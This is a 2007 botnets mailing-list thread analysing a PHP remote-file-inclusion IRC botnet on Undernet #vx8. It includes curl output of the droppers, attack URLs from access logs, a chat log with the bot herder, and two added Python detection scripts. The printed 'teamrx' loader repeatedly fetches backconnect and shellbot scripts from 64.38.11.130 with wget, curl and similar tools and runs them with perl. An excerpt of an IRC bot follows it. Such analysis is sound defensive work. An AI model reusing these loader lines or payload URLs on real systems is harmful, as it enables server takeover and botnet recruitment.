To report a botnet PRIVATELY please email: [EMAIL PROTECTED]
----------



I also see: GET http://64.38.11.130/~marzoky/images/kgb.c which points
to that channel.

[11:12:50 bash] [~]
[EMAIL PROTECTED] curl http://64.38.11.130/~marzoky/images/kgb.c | grep include
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100 22264  100 22264    0     0  41928      0 --:--:-- --:--:-- --:--:-- 75436
include 'http://64.38.11.130/~marzoky/images/teamrx';
include 'http://64.38.11.130/~marzoky/images/toyo.txt?';
[11:12:56 bash] [~]
[EMAIL PROTECTED] curl http://64.38.11.130/~marzoky/images/teamrx
<?

// BYY xeQter

shell_exec('cd /tmp; wget http://64.38.11.130/~marzoky/images/bc.txt ; perl bc.txt 64.38.11.130 ; rm -rf bc.txt');
shell_exec('cd /tmp;curl -O http://64.38.11.130/~marzoky/images/bc.txt ; perl bc.txt 64.38.11.130 ; rm -rf bc.txt');
shell_exec('cd /tmp;lwp-download http://64.38.11.130/~marzoky/images/bc.txt ; perl bc.txt 64.38.11.130 ; rm -rf bc.txt');
shell_exec('cd /tmp;fetch http://64.38.11.130/~marzoky/images/bc.txt>bc.txt ; perl bc.txt 64.38.11.130 ; rm -rf bc.txt');
shell_exec('cd /tmp;GET http://64.38.11.130/~marzoky/images/bc.txt>bc.txt ; perl bc.txt 64.38.11.130 ; rm -rf bc.txt');
system('cd /tmp;wget http://64.38.11.130/~marzoky/images/bc.txt ; perl bc.txt 64.38.11.130 ; rm -rf bc.txt');
system('cd /tmp;curl -O http://64.38.11.130/~marzoky/images/bc.txt ; perl bc.txt 64.38.11.130 ; rm -rf bc.txt');
system('cd /tmp;lwp-download http://64.38.11.130/~marzoky/images/bc.txt ; perl bc.txt 64.38.11.130 ; rm -rf bc.txt');
system('cd /tmp;fetch http://64.38.11.130/~marzoky/images/bc.txt>bc.txt ; perl bc.txt 64.38.11.130 ; rm -rf bc.txt');
system('cd /tmp;GET http://64.38.11.130/~marzoky/images/bc.txt>bc.txt ; perl bc.txt 64.38.11.130 ; rm -rf bc.txt');
passthru('cd /tmp;wget http://64.38.11.130/~marzoky/images/bc.txt ; perl bc.txt 64.38.11.130 ; rm -rf bc.txt');
passthru('cd /tmp;curl -O http://64.38.11.130/~marzoky/images/bc.txt ; perl bc.txt 64.38.11.130 ; rm -rf bc.txt');
passthru('cd /tmp;lwp-download http://64.38.11.130/~marzoky/images/bc.txt ; perl bc.txt 64.38.11.130 ; rm -rf bc.txt');
passthru('cd /tmp;fetch http://64.38.11.130/~marzoky/images/bc.txt>bc.txt ; perl bc.txt 64.38.11.130 ; rm -rf  bc.txt');
passthru('cd /tmp;GET http://64.38.11.130/~marzoky/images/bc.txt>bc.txt ; perl bc.txt 64.38.11.130 ; rm -rf bc.txt');
shell_exec('cd /tmp;wget http://64.38.11.130/~marzoky/images/bc.txt ; perl bc.txt 64.38.11.130 ; rm -rf bc.txt');
shell_exec('cd /tmp;curl -O http://64.38.11.130/~marzoky/images/bc.txt ; perl bc.txt 64.38.11.130');
shell_exec('cd /tmp;lwp-download http://64.38.11.130/~marzoky/images/bc.txt ; perl bc.txt 64.38.11.130');
shell_exec('cd /tmp;fetch http://64.38.11.130/~marzoky/images/n.txt>n.txt ; perl n.txt');
shell_exec('cd /tmp;GET http://64.38.11.130/~marzoky/images/n.txt>n.txt ; perl n.txt');
system('cd /tmp;wget http://64.38.11.130/~marzoky/images/n.txt ; perl n.txt ; rm -rf n.txt n.txt.*');
system('cd /tmp;curl -O http://64.38.11.130/~marzoky/images/n.txt ; perl n.txt ; rm -rf n.txt n.txt.*');
system('cd /tmp;lwp-download http://64.38.11.130/~marzoky/images/n.txt ; perl n.txt ; rm -rf n.txt n.txt.*');
system('cd /tmp;fetch http://64.38.11.130/~marzoky/images/n.txt>n.txt ; perl n.txt ; rm -rf n.txt n.txt.*');
system('cd /tmp;GET http://64.38.11.130/~marzoky/images/n.txt>n.txt ; perl n.txt ; rm -rf n.txt n.txt.*');
passthru('cd /tmp;wget http://64.38.11.130/~marzoky/images/n.txt ; perl n.txt ; rm -rf n.txt n.txt.*');
passthru('cd /tmp;curl -O http://64.38.11.130/~marzoky/images/n.txt ; perl n.txt ; rm -rf n.txt n.txt.*');
passthru('cd /tmp;lwp-download http://64.38.11.130/~marzoky/images/n.txt ; perl n.txt ; rm -rf n.txt n.txt.*');
passthru('cd /tmp;fetch http://64.38.11.130/~marzoky/images/n.txt>n.txt ; perl n.txt ; rm -rf n.txt n.txt.*');
passthru('cd /tmp;GET http://64.38.11.130/~marzoky/images/n.txt>n.txt ; perl n.txt ; rm -rf n.txt n.txt.*');
shell_exec('cd /tmp;rm -rf bc.txt*');
system('cd /tmp;rm -rf bc.txt*');
passthru('cd /tmp;rm -rf bc.txt*');
?>
[11:13:09 bash] [~]
[EMAIL PROTECTED] curl http://64.38.11.130/~marzoky/images/toyo.txt
<?php
error_reporting(0);
set_magic_quotes_runtime(0);
@set_time_limit(0);
@ini_set('max_execution_time',0);
@ini_set('output_buffering',0);
$safe = @ini_get('safe_mode');
$up = time();
$mn1 = php_uname();
$mn2 = PHP_OS;
function randomkeys($length)
{
  $pattern = "abcdefghijklmnopqrstuvwxyz";
  for($i=0;$i<$length;$i++)
  {
    $key .= $pattern{rand(0,35)};
  }
  return $key;
}

// BYY xeQter vS TeaMrx - Br0nx

$ip = $_SERVER['REMOTE_ADDR'];
$HTTP_HOST = getenv("HTTP_HOST");
$REQUEST_URI = getenv("REQUEST_URI");
$xeQted = "[x] $HTTP_HOST$REQUEST_URI";
if (@file_exists("/bin/sh")) $pro1="sh$: Yes"; else $pro1="sh$: NO";
if (@file_exists("/usr/bin/wget")) $pro2="WGET: yes"; else $pro2="WGET: NO";
if (@file_exists("/usr/bin/curl")) $pro3="CURL: yes"; else $pro3="CURL: NO";
if (@file_exists("/usr/bin/lynx")) $pro4="LYNX: yes" ; else $pro4="LYNX: NO";
if (@file_exists("/usr/bin/GET")) $pro5="GET: yes"; else $pro5="GET: No";
if ($safe) $xsafe="Safe_mode: ON"; if (!$safe) $xsafe="safe_mode: OFF"; else $xsafe="Safe_mode: Unknown";
[EMAIL PROTECTED](); [EMAIL PROTECTED](); [EMAIL PROTECTED]();
$phpver = "PHP ".phpversion();

$vhost = "e8ea21c62fc9b75647054059b815d350";
$vhost2 = "7886906c819599697c97aa15d8e37f62";
$vhost3 = 'xeQt.users.undernet.org';
$identd = randomkeys(4).rand(100,999);
$me = randomkeys(5).rand(100,999);
$ircname = randomkeys(4).rand(100,999);
$version = "TeaMrx v1.0";
$server = "eu.undernet.org";
$quitmsg = "xeQt vS TeaMrx";
$chan = "#vx8";
$port = '6667';

while(0==0)
{
$ircsock = @fsockopen($server, $port);
James Pleger
Go Daddy Software, Inc.
[EMAIL PROTECTED]
Desk: 480-505-8800 x4093
Cell: 480-262-7293

This email message and any attachments hereto is intended for use only by the addressee(s) named herein and may contain legally privileged and/or confidential information. If you have received this email in error, please immediately notify the sender and permanently delete the original and any copy of this message and its attachments.
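The two curl fetches above show the dropper's shape: a PHP file whose only real content is a chain of remote `include` statements and a battery of `shell_exec`/`system`/`passthru` calls that each try a different download tool before handing the file to `perl`. The `grep include` pass is the first triage step; the script below is an added example (not code from the thread or from any project it mentions) that does the same triage mechanically over a constructed PHP sample with placeholder hosts. It reports every literal remote URL passed to include/require and every exec call whose shell command both fetches with one of the five downloaders seen here and runs an interpreter on the result.

```python
import re
from typing import Dict, List

# Constructed sample (NOT the real kgb.c / teamrx from the thread): same structure as the
# droppers quoted above, with placeholder hosts and a harmless echo for contrast.
SAMPLE_PHP = r"""<?
include 'http://host.example.invalid/~user/images/teamrx';
include 'http://host.example.invalid/~user/images/toyo.txt?';
require_once("http://other.example.invalid/x.txt");
shell_exec('cd /tmp; wget http://host.example.invalid/~user/images/bc.txt ; perl bc.txt 10.0.0.1 ; rm -rf bc.txt');
system('cd /tmp;curl -O http://host.example.invalid/~user/images/n.txt ; perl n.txt ; rm -rf n.txt n.txt.*');
passthru('cd /tmp;rm -rf bc.txt*');
echo "hello";
?>"""

# include/require whose argument is a literal remote URL (the RFI chaining seen in kgb.c).
REMOTE_INCLUDE_RE = re.compile(
    r"""\b(include_once|require_once|include|require)\s*\(?\s*(['"])((?:https?|ftp)://[^'"]+)\2""",
    re.IGNORECASE,
)
# Command-execution functions called with a literal string argument.
EXEC_FUNCS = ("shell_exec", "system", "passthru", "exec", "popen", "proc_open")
EXEC_CALL_RE = re.compile(
    r"\b(" + "|".join(EXEC_FUNCS) + r")\s*\(\s*(['\"])(.*?)\2\s*[,)]",
    re.IGNORECASE | re.DOTALL,
)
# The fetch tools the loader tries in turn, and the interpreters it feeds the file to.
DOWNLOADERS = {"wget", "curl", "lwp-download", "fetch", "GET"}
INTERPRETERS = {"perl", "python", "sh", "bash"}


def find_remote_includes(src: str) -> List[str]:
    """Return the remote URLs passed literally to include/require."""
    return [m.group(3) for m in REMOTE_INCLUDE_RE.finditer(src)]


def _words(cmd: str) -> List[str]:
    # Shell words that look like command names; tool names such as lwp-download stay whole.
    return re.findall(r"[A-Za-z_][A-Za-z0-9_-]*", cmd)


def find_download_and_run(src: str) -> List[Dict[str, object]]:
    """Exec calls whose shell command uses a known downloader; notes whether the
    command also invokes an interpreter, i.e. the fetch-then-run pattern."""
    hits = []
    for m in EXEC_CALL_RE.finditer(src):
        func, cmd = m.group(1).lower(), m.group(3)
        words = _words(cmd)
        tools = sorted(w for w in set(words) if w in DOWNLOADERS)
        if not tools:
            continue
        hits.append({
            "func": func,
            "downloaders": tools,
            "runs_interpreter": any(w.lower() in INTERPRETERS for w in words),
            "command": cmd,
        })
    return hits


def triage(src: str) -> Dict[str, object]:
    """Summarise a PHP source file: remote includes, fetch-and-run chains, verdict."""
    includes = find_remote_includes(src)
    chains = find_download_and_run(src)
    verdict = "suspicious" if (includes or chains) else "no remote-include/dropper pattern"
    return {"remote_includes": includes, "download_and_run": chains, "verdict": verdict}


if __name__ == "__main__":
    result = triage(SAMPLE_PHP)
    print("verdict:", result["verdict"])
    for url in result["remote_includes"]:
        print("remote include:", url)
    for hit in result["download_and_run"]:
        print(f"{hit['func']}: {hit['downloaders']} -> interpreter={hit['runs_interpreter']}")
```

The regexes only catch literal string arguments; a sample that builds its URLs or commands from variables would need a real PHP parser, so treat an empty result as "nothing obvious", not as clean.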


David Vorel wrote:

Hi all, 

Nice shot, Bodik ;] I found a different botnet on eu.undernet.org chan #vx8. It's a Linux
zombie-based botnet that spreads through various bugs in PHP. Undernet
admins, please take a look at it. Description follows. Botnet herders are
Denzel, xeQt, aslpls-.


First attempt: 

85.17.11.53 - - [20/Mar/2007:04:10:41 +0100] "GET
/index.php?loc=http://nawader.org/modules/Top/kgb.c? HTTP/1.1" 200 132
"-" "libwww-perl/5.79"

We mirror all links included; the engine for RFI source is not completed
yet, so for this time I send raw URLs.

http://nawader.org/modules/Top/kgb.c
http://www.honeynet.cz/bots/5249235d1476c24250130da98b9a34b5.txt 
- PHP shell which includes other links

http://nawader.org/modules/Top/bc.txt
http://www.honeynet.cz/bots/4456038f56e4b71b01ed0a348cbfeb41.txt
- Backconnect shell

http://nawader.org/modules/Top/n.txt
http://www.honeynet.cz/bots/adc704f9697cdf89da9d503b11f9787d.txt
- Shellbot I, connect to eu.undernet.org #vx8

http://nawader.org/modules/Top/teamrx
http://www.honeynet.cz/bots/68f984e9f37e3911b92493cbb9b04aef.txt
- Loader for n.txt and bc.txt; runs backconnect and sends shell to
  220.232.137.199 and 64.38.11.130


http://nawader.org/modules/Top/toyo.txt
http://www.honeynet.cz/bots/80d97c973062d7d2d369f5f79578a597.txt
- Shellbot II, connect to eu.undernet.org #vx8



All scripts are labelled "xeQt vS TeaMrx".

Who on chan:

http://www.honeynet.cz/trash/list

After a while on the channel, bot herders move bots to another chan.

#vx8 :<@xeQt> !x !join #perljunkies aV5&bvhyI
#vx8 :<@xeQt> !x !join #mp3fulls 209x5Vi.



Here is the list from uname -sr.

http://www.honeynet.cz/trash/uname




chat: 

<crop>
  
:[EMAIL PROTECTED] PRIVMSG #vx8 :im no geek i tould
u
:[EMAIL PROTECTED] PRIVMSG #vx8 :im a criminal
:[EMAIL PROTECTED] PRIVMSG #vx8 :make shit
      
<< PRIVMSG #vx8 :i now that you are criminal
<< PRIVMSG #vx8 :but still on free ?
  
:[EMAIL PROTECTED] PRIVMSG #vx8 :nothings free
:[EMAIL PROTECTED] PRIVMSG #vx8 :$$
      
<< PRIVMSG xeQt :^AVERSION^A
  
:[EMAIL PROTECTED] NOTICE nirgil :^AVERSION mIRC
v6.17 Khaled Mardam-Bey^A
:[EMAIL PROTECTED] PRIVMSG #vx8 :its my life
      
<< PRIVMSG #vx8 :jail is for free
  
:[EMAIL PROTECTED] PRIVMSG #vx8 :i know
:[EMAIL PROTECTED] PRIVMSG #vx8 :im going sooon
      
<< PRIVMSG #vx8 :y are waiting for ?
  
:[EMAIL PROTECTED] PRIVMSG #vx8 :its full
:[EMAIL PROTECTED] PRIVMSG #vx8 :a few months
:[EMAIL PROTECTED] PRIVMSG #vx8 :im no murder, so i
goto wait
      
</crop>

<crop>
  
:[EMAIL PROTECTED] PRIVMSG #vx8 :thats a trickey one
:[EMAIL PROTECTED] PRIVMSG #vx8 :cuz i dont touch
any of the servers
      
<< PRIVMSG #vx8 :when u installed your script throught bug in php that's
touching too
  
:[EMAIL PROTECTED] PRIVMSG #vx8 ::)))
:[EMAIL PROTECTED] PRIVMSG #vx8 :i tould you
:[EMAIL PROTECTED] PRIVMSG #vx8 :its magic
:[EMAIL PROTECTED] PRIVMSG #vx8 :i dont connect to
anything
      
<< PRIVMSG #vx8 :yes u did
  
:[EMAIL PROTECTED] PRIVMSG #vx8 :no i  didn't
:[EMAIL PROTECTED] PRIVMSG #vx8 :all the bots do my
job
      
<< PRIVMSG #vx8 :and that is ?
  
:[EMAIL PROTECTED] PRIVMSG #vx8 :you know what mass
spread is?
      
<< PRIVMSG #vx8 :<@xeQt> !x !join #perljunkies aV5&bvhyI
<< PRIVMSG #vx8 :and what about this ?
  
:[EMAIL PROTECTED] PRIVMSG #vx8 :so?
:[EMAIL PROTECTED] PRIVMSG #vx8 :how you get this ip
address from that?
      
<< PRIVMSG #vx8 :this command is better one..
<< PRIVMSG #vx8 :<@xeQt> !x uname -sr
  
:[EMAIL PROTECTED] PRIVMSG #vx8 :!x id
:[EMAIL PROTECTED] PRIVMSG #vx8 :uid=33949(nucsaor)
gid=33952(nucsaor) groups=33952(nucsaor)
:[EMAIL PROTECTED] PRIVMSG #vx8 :uid=33(www-data)
gid=33(www-data) groups=33(www-data)
:[EMAIL PROTECTED] PRIVMSG #vx8 :like that?
:[EMAIL PROTECTED] PRIVMSG #vx8
:uid=80(www) gid=80(www) groups=80(www)
:[EMAIL PROTECTED] PRIVMSG #vx8 :uid=80(www)
gid=80(www) groups=80(www)
      
<< PRIVMSG #vx8 :yes, now you are in direct connect with these servers
..
  
:[EMAIL PROTECTED] PRIVMSG #vx8 :i dont think you
have no clue man
      
<< PRIVMSG #vx8 :thats the point of abuse ..
<< PRIVMSG #vx8 :these servers are yours ?
<< PRIVMSG #vx8 :or not ?
  
:[EMAIL PROTECTED] PRIVMSG #vx8 :i understand your
pissed off, but this is useless
:[EMAIL PROTECTED] PRIVMSG #vx8 :call the cops, make
them trace me... but its useless
      
<< PRIVMSG #vx8 :I think that all servers here are used to fraud ..
<< PRIVMSG #vx8 :i dont think so ..
  
:[EMAIL PROTECTED] PRIVMSG #vx8 :!x unset HISTFILE
HISTSAVE
      
<< PRIVMSG #vx8 :heh
  
:[EMAIL PROTECTED] PRIVMSG #vx8 :o_0
:[EMAIL PROTECTED] PRIVMSG #vx8 :i dont see how you
get ip from that
      
<< PRIVMSG #vx8 :from what ?
  
:[EMAIL PROTECTED] PRIVMSG #vx8 :David Hac?
      
<< PRIVMSG #vx8 :?
  
:[EMAIL PROTECTED] PRIVMSG #vx8 :David Hac
:[EMAIL PROTECTED] PRIVMSG #vx8 :man
      
<< PRIVMSG #vx8 :what ?
  
:[EMAIL PROTECTED] PRIVMSG #vx8 :good luck hunting
me
:[EMAIL PROTECTED] PRIVMSG #vx8 :with feds
:[EMAIL PROTECTED] PRIVMSG #vx8 :its useless
:[EMAIL PROTECTED] PRIVMSG #vx8 :for sure
:[EMAIL PROTECTED] PRIVMSG #vx8 :but do it.. i dont
say no but.. goood luck
      
<< PRIVMSG #vx8 :i'm not hunting you, thats work for authorities.
  
:[EMAIL PROTECTED] PRIVMSG #vx8 :yes
:[EMAIL PROTECTED] PRIVMSG #vx8 :goood
:[EMAIL PROTECTED] PRIVMSG #vx8 :i like a channelge
:[EMAIL PROTECTED] PRIVMSG #vx8 :challenge
      
<< PRIVMSG #vx8 :so what for now ?
  
:[EMAIL PROTECTED] PRIVMSG #vx8 :i dont need to
:[EMAIL PROTECTED] PRIVMSG #vx8 :why wold i do that?
:[EMAIL PROTECTED] PRIVMSG #vx8 :im the bitch, you
the victum..
      
<< PRIVMSG #vx8 :i'm not victim ..
  
:[EMAIL PROTECTED] PRIVMSG #vx8 :you hunt me
      
<< PRIVMSG #vx8 :others are victims ..
  
:[EMAIL PROTECTED] PRIVMSG #vx8 :your right
:[EMAIL PROTECTED] PRIVMSG #vx8 :you a cop?
      
<< PRIVMSG #vx8 :yes
<< PRIVMSG #vx8 :;]
  
:[EMAIL PROTECTED] PRIVMSG #vx8 :and?
:[EMAIL PROTECTED] NICK :CopKiller
:[EMAIL PROTECTED] PRIVMSG #vx8 :what you gonna do
about it?
:[EMAIL PROTECTED] PRIVMSG #vx8 :call your friends,
girlfriends....
:[EMAIL PROTECTED] PRIVMSG #vx8 :cuz i dont give a
fuck
:[EMAIL PROTECTED] PRIVMSG #vx8 :here i kick cops
      
<< PRIVMSG #vx8 :so kick me dude ;]
  
:[EMAIL PROTECTED] PRIVMSG #vx8 :dont need to
      
<< PRIVMSG #vx8 :heh
  
:[EMAIL PROTECTED] PRIVMSG #vx8 :come here and ill
show you
      
<< PRIVMSG #vx8 :i'm here
  
:[EMAIL PROTECTED] PRIVMSG #vx8 :in my hoood
:[EMAIL PROTECTED] PRIVMSG #vx8 :not mirc
      
</crop>

Cheers.. 

David Vorel

_______________________________________________
To report a botnet PRIVATELY please email: [EMAIL PROTECTED]
All list and server information are public and available to law enforcement upon request.
http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
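The "first attempt" access-log line in the post above is the whole detection problem in one record: a GET whose query parameter value is itself a URL, ending in `?`, from a `libwww-perl` client. As an added example (not from the thread or any tool it names), the script below parses Apache combined-format lines and flags any query parameter whose decoded value starts with a remote scheme, recording the trailing `?` and the scripted user agent as supporting indicators. The log lines are constructed with documentation-range addresses and placeholder hosts; the first mirrors the shape of the quoted attempt, the third is the same technique URL-encoded.

```python
import re
from typing import Dict, List, Optional
from urllib.parse import parse_qsl, urlsplit

# Apache/NCSA "combined" log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
REMOTE_SCHEMES = ("http://", "https://", "ftp://")

# Constructed log lines (NOT from the thread). Lines 2 and 4 are ordinary traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [20/Mar/2007:04:10:41 +0100] "GET /index.php?loc=http://files.example.invalid/kgb.c? HTTP/1.1" 200 132 "-" "libwww-perl/5.79"',
    '198.51.100.9 - - [20/Mar/2007:04:12:02 +0100] "GET /index.php?loc=home HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [20/Mar/2007:04:13:10 +0100] "GET /modules/view.php?page=http%3A%2F%2Ffiles.example.invalid%2Fn.txt%3F HTTP/1.1" 404 210 "-" "libwww-perl/5.79"',
    '192.0.2.33 - - [20/Mar/2007:04:15:00 +0100] "POST /login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
]


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Split one combined-format line into its fields, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def rfi_findings(line: str) -> List[Dict[str, object]]:
    """One finding per query parameter whose decoded value is a remote URL."""
    rec = parse_line(line)
    if rec is None:
        return []
    parts = urlsplit(rec["target"])
    findings = []
    # parse_qsl percent-decodes values, so the encoded variant is caught as well.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if not value.lower().startswith(REMOTE_SCHEMES):
            continue
        findings.append({
            "ip": rec["ip"],
            "path": parts.path,
            "param": name,
            "url": value,
            # Supporting indicators, both present on the attempt quoted in the post.
            "trailing_qmark": value.endswith("?"),
            "scripted_client": "libwww-perl" in rec["ua"].lower(),
            "status": int(rec["status"]),
            "ua": rec["ua"],
        })
    return findings


def scan(lines: List[str]) -> List[Dict[str, object]]:
    """Run rfi_findings over a whole log and return every finding in order."""
    out: List[Dict[str, object]] = []
    for ln in lines:
        out.extend(rfi_findings(ln))
    return out


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f['ip']} {f['path']} {f['param']}={f['url']} "
              f"status={f['status']} qmark={f['trailing_qmark']} scripted={f['scripted_client']}")
```

A URL in a parameter is not proof of compromise: a 404 means the script was not there, and even a 200 only says the page responded. The line to act on is the one where the parameter name matches an include path in the application and the response was served; a legitimate redirect parameter that carries a URL will also match and needs an allow-list.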


  